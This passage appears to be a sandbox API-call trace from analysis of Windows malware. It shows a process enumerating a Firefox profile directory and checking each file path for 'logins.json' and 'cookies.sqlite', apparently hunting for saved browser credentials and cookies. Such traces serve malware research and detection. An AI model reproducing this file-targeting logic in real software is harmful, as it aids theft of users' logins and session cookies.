HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.200] lstrlenW (lpString="\\*.*") returned 4 [0161.200] GetProcessHeap () returned 0x8e0000 [0161.200] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x9256c0 [0161.200] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.200] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*" [0161.200] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*.*", lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.201] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.201] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.201] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.201] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.201] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc37c9330, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc37c9330, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc37df2c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-05_5.json", cAlternateFileName="BOOKMA~1.JSO")) returned 1 [0161.201] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.201] lstrlenW (lpString="\\") returned 1 [0161.201] GetProcessHeap () returned 0x8e0000 [0161.201] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x9257a0 [0161.201] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.201] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0161.201] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0161.201] lstrlenW (lpString="bookmarks-2017-06-05_5.json") returned 27 [0161.201] GetProcessHeap () returned 0x8e0000 [0161.201] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x925880 [0161.201] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0161.201] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-05_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json" [0161.201] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2deff0, dwLength=0x1c | out: lpBuffer=0x2deff0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.201] GetProcessHeap () returned 0x8e0000 [0161.201] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.201] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json", lpSrch="logins.json") returned 0x0 [0161.202] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-05_5.json", lpSrch="cookies.sqlite") returned 0x0 [0161.202] VirtualQuery (in: lpAddress=0x925880, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.202] GetProcessHeap () returned 0x8e0000 [0161.202] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925880 | out: hHeap=0x8e0000) returned 1 [0161.202] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85017d10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-16_5.json", cAlternateFileName="BOOKMA~2.JSO")) returned 1 [0161.202] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.202] lstrlenW (lpString="\\") returned 1 [0161.202] GetProcessHeap () returned 0x8e0000 [0161.202] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x9257a0 [0161.202] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.202] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0161.202] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0161.202] lstrlenW (lpString="bookmarks-2017-06-16_5.json") returned 27 [0161.202] GetProcessHeap () returned 0x8e0000 [0161.202] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x925880 [0161.202] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0161.202] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="bookmarks-2017-06-16_5.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json" [0161.202] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2deff0, dwLength=0x1c | out: lpBuffer=0x2deff0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.202] GetProcessHeap () returned 0x8e0000 [0161.202] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.202] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json", lpSrch="logins.json") returned 0x0 [0161.202] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\bookmarks-2017-06-16_5.json", lpSrch="cookies.sqlite") returned 0x0 [0161.202] VirtualQuery (in: lpAddress=0x925880, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.202] GetProcessHeap () returned 0x8e0000 [0161.202] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925880 | out: hHeap=0x8e0000) returned 1 [0161.202] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85017d10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x85017d10, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85017d10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarks-2017-06-16_5.json", cAlternateFileName="BOOKMA~2.JSO")) returned 0 [0161.202] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.203] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.203] GetProcessHeap () returned 0x8e0000 [0161.203] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.203] VirtualQuery (in: lpAddress=0x8fcf68, lpBuffer=0x2deffc, dwLength=0x1c | out: lpBuffer=0x2deffc*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.203] GetProcessHeap () returned 0x8e0000 [0161.203] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcf68 | out: hHeap=0x8e0000) returned 1 [0161.203] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.203] GetProcessHeap () returned 0x8e0000 [0161.203] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.203] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.203] lstrlenW (lpString="\\") returned 1 [0161.203] GetProcessHeap () returned 0x8e0000 [0161.203] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.203] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.203] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.203] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.203] lstrlenW (lpString="bookmarkbackups") returned 15 [0161.203] GetProcessHeap () returned 0x8e0000 [0161.203] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0161.204] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.204] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.204] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.204] GetProcessHeap () returned 0x8e0000 [0161.204] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.204] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpSrch="logins.json") returned 0x0 [0161.204] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpSrch="cookies.sqlite") returned 0x0 [0161.204] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.204] GetProcessHeap () returned 0x8e0000 [0161.204] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.204] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb47c9bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb47c9bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="cert8.db", cAlternateFileName="")) returned 1 [0161.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.204] lstrlenW (lpString="\\") returned 1 [0161.204] GetProcessHeap () returned 0x8e0000 [0161.204] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.204] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.204] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.204] lstrlenW (lpString="cert8.db") returned 8 [0161.204] GetProcessHeap () returned 0x8e0000 [0161.204] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x925780 [0161.204] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.204] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cert8.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" [0161.204] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.204] GetProcessHeap () returned 0x8e0000 [0161.204] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.204] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db", lpSrch="logins.json") returned 0x0 [0161.204] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db", lpSrch="cookies.sqlite") returned 0x0 [0161.204] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.204] GetProcessHeap () returned 0x8e0000 [0161.204] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.204] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="compatibility.ini", cAlternateFileName="COMPAT~1.INI")) returned 1 [0161.204] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.205] lstrlenW (lpString="\\") returned 1 [0161.205] GetProcessHeap () returned 0x8e0000 [0161.205] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.205] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.205] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.205] lstrlenW (lpString="compatibility.ini") returned 17 [0161.205] GetProcessHeap () returned 0x8e0000 [0161.205] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x925780 [0161.205] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.205] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="compatibility.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" [0161.205] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.205] GetProcessHeap () returned 0x8e0000 [0161.205] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.205] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini", lpSrch="logins.json") returned 0x0 [0161.205] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini", lpSrch="cookies.sqlite") returned 0x0 [0161.205] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.205] GetProcessHeap () returned 0x8e0000 [0161.205] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.205] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e8ce50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5e8ce50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, 